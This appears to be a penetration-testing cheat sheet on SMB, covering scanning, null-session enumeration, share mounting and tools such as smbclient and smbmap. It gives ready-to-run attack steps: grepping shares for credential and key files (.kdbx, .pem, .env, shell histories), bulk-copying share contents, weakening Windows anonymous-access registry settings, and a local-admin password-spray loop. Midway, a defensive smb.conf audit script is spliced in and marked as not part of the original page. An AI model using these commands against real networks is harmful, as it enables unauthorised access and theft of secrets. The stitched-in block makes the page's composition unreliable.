SMB
Server Message Block
Check for SMB vulnerabilities with Nmap:
$ sudo nmap -sV --script-args=unsafe=1 --script smb-os-discovery 10.10.13.37 -p139,445
$ sudo nmap -n -Pn -sV --script 'smb-vuln*' 10.10.13.37 -p445
Check if SMB Signing is enabled with CME:
$ cme smb smb.txt | grep -a 'signing:False'
Fingerprint
Enumerate the SMB version on old versions of Samba (for security reasons, modern clients will not initiate a connection using legacy protocols):
$ sudo ngrep -i -d eth0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
$ echo exit | smbclient -N -L 10.10.13.37 --option='client min protocol=LANMAN1'
Mounting
Mount:
$ sudo mount -t cifs '//127.0.0.1/Users' /mnt/smb -v -o user=snovvcrash,[pass='Passw0rd!']
Status:
$ mount -v | grep 'type cifs'
$ df -k -F cifs
Unmount:
$ sudo umount /mnt/smb
SMB Share with Null Authentication
Create an SMB share allowing null authentication.
Linux
[global]
map to guest = bad user
server role = standalone server
usershare allow guests = yes
smb ports = 445
[smb]
comment = Samba
path = /srv/smb
guest ok = yes
read only = no
browsable = yes
force user = nobody
$ sudo service smbd restart
$ sudo chown -R nobody:root /srv/smb/
$ sudo chmod -R 777 /srv/smb/
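To audit a Samba host for the guest settings used in the configuration above, the following added example (not part of the original page) parses smb.conf text and reports the parameters that open a share to unauthenticated sessions. The function names and finding labels are illustrative assumptions, and the sample is a constructed excerpt of the page's config.

```python
import re

def parse_smb_conf(text):
    """Parse smb.conf text into {section: {normalized_parameter: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":  # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip().lower(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            # Samba ignores case and whitespace inside parameter names
            current[re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections

def truthy(value):
    return value.strip().lower() in {"yes", "true", "on", "1"}  # Samba's "true" spellings

def audit(text):
    """Return sorted (section, finding) pairs for guest / null-session exposure."""
    conf, out = parse_smb_conf(text), []
    glob = conf.get("global", {})
    if glob.get("maptoguest", "never").lower() != "never":
        out.append(("global", "map-to-guest"))      # failed logons become guest sessions
    if truthy(glob.get("usershareallowguests", "no")):
        out.append(("global", "usershare-guests"))  # user-defined shares may admit guests
    for name, share in conf.items():
        if name == "global" or not truthy(share.get("guestok", share.get("public", "no"))):
            continue
        if "readonly" in share:
            writable = not truthy(share["readonly"])
        else:  # writeable / writable / write ok are inverted synonyms of read only
            writable = any(truthy(share.get(k, "no")) for k in ("writeable", "writable", "writeok"))
        out.append((name, "guest-write" if writable else "guest-read"))
    return sorted(out)

# Constructed sample: the guest-related lines of the smb.conf shown on this page
PAGE_CONF = """[global]
map to guest = bad user
usershare allow guests = yes
[smb]
guest ok = yes
read only = no
"""

if __name__ == "__main__":
    print(*audit(PAGE_CONF), sep="\n")
```

For the effective configuration (includes resolved, defaults applied), feed it the output of `testparm -s` instead of the raw file.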
Windows
PS > mkdir C:\share
PS > icacls C:\share\ /T /grant Anonymous` logon:r
PS > icacls C:\share\ /T /grant Everyone:r
PS > New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f # this will overwrite existing NullSessionPipes
PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
Hunt for Shares & Content
Toy Example
Collect a listing of files with size < 10 MB:
PS > cd \\megacorp.local\share
PS > Get-ChildItem -Recurse -File | ? { $_.Length -lt 10MB } | select -ExpandProperty FullName | Out-File share.txt
Filter only files of interest based on their extensions, print the stats as a Python dict:
$ dos2unix share.txt
$ cat share.txt | grep -e '\.7z$' -e '\.bak$' -e '\.bash_history$' -e '\.bat$' -e '\.bz2$' -e '\.cfg$' -e '\.cmd$' -e '\.conf$' -e '\.csv$' -e '\.doc$' -e '\.docm$' -e '\.docx$' -e '\.env$' -e '\.gz$' -e '\.ini$' -e '\.json$' -e '\.kdbx$' -e '\.key$' -e '\.odp$' -e '\.ods$' -e '\.odt$' -e '\.old$' -e '\.ovpn$' -e '\.p12$' -e '\.pdf$' -e '\.pem$' -e '\.pfx$' -e '\.ppt$' -e '\.pptx$' -e '\.ps1$' -e '\.rar$' -e '\.rtf$' -e '\.sh$' -e '\.tar$' -e '\.txt$' -e '\.vbs$' -e '\.xls$' -e '\.xlsm$' -e '\.xlsx$' -e '\.xml$' -e '\.yaml$' -e '\.yml$' -e '\.zip$' -e '\.zsh_history$' \
| awk -F. '{print $NF}' \
| sort \
| uniq -c \
| awk 'BEGIN { d = "{" } { d = d sprintf("\x27.%s\x27: %s, ", $2, $1) } END { d = substr(d, 1, length(d)-2); print d "}" }'
Generate a list of wanted files (Python) and copy them locally preserving original directory structure (PS):
#!/usr/bin/env python3
# gen_list.py share.txt > files.txt
import sys
from pathlib import Path
from random import sample

# Paste the dict printed by the previous step here
stats = { ... }

with open(sys.argv[1]) as f:
    files = f.read().splitlines()

for suffix, count in stats.items():
    # Keep every file of this type, or a random 1000 of them if there are more
    arr = [line for line in files if Path(line).suffix == suffix]
    if count > 1000:
        arr = sample(arr, 1000)
    for a in arr:
        print(a)
Tools
rpcclient
Check for null authentication:
$ rpcclient -N -L 127.0.0.1
With user creds:
$ rpcclient -U 'snovvcrash%Passw0rd!' 127.0.0.1
smbclient(.py)
Check for null authentication:
$ smbclient -N -L 127.0.0.1
$ smbclient -N '\\127.0.0.1\Data'
With user creds:
$ smbclient -U snovvcrash '\\127.0.0.1\Users' 'Passw0rd!'
Get all files recursively:
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
Local admin spray:
$ cat use_c.cmd
use c$
ls Windows
$ for srv in `cat 445.tcp`; do proxychains4 -q smbclient.py Administrator:'Passw0rd!'@$srv -inputfile use_c.cmd |& grep Windows && echo $srv; done
smbmap
$ smbmap -H 127.0.0.1
$ smbmap -H 127.0.0.1 -u anonymous
$ smbmap -H 127.0.0.1 -u '' -p ''
$ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName
$ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName -A .